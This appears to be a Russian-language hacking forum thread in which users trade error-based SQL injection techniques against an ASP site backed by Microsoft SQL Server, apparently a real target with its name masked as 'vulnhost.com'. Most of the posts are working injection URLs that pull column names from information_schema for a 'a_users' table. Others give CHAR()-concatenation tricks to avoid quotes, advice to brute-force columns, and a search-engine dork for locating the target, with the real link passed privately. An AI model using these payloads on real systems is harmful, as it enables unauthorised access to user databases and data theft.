Всем здрасте!=)
При банальном запросе вида:
http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+col umn_name+FROM+information_schema.columns+where+tab le_name='a_users')--
Получил ошибку, следующего содержания:

Microsoft OLE DB Provider for SQL Server error '80040e14'

Joined tables cannot be specified in a query containing outer join operators. View or function 'information_schema.columns' contains joined tables.

/details.asp, line 59

Вопрос, реально ли в этой ситуации выдернуть имена столбцов, или придется перебирать? И если реально - то как это сделать?

http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+col umn_name+FROM+information_schema.columns+where+tab le_name=CHAR(97,95,117,115,101,114,115))--

http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+col umn_name+FROM+information_schema.columns+where+tab le_name=CHAR(97,95,117,115,101,114,115))--

Вот так делать не надо, будет ошибка :
The char function requires 1 arguments.

Если уж char , то вот так : char(97)%2Bchar(95)%2Bchar(117)%2Bchar(115)%2Bchar (101)%2Bchar(114)%2Bchar(115)

Но ИМХО дело не в этом, ошибка какая-то не та. Если не то, давай линк, а то гадания опять на три страницы будут :)

колонки придется брутить, jokester inurl:details.asp?memberid=244247 только 1 линк)

http://www.vulnhost.com/details.asp?memberid=244247+or+1=(SELECT+TOP+1+col umn_name+FROM+information_schema.columns+where+tab le_name=CHAR(97,95,117,115,101,114,115))--

мда.......

jokester, l1ght - линк в ПМ.
А доктору и гисти по минусу бы поставить:-D

Проблема решилась много проще=) все 97 столбцов оказались числовыми....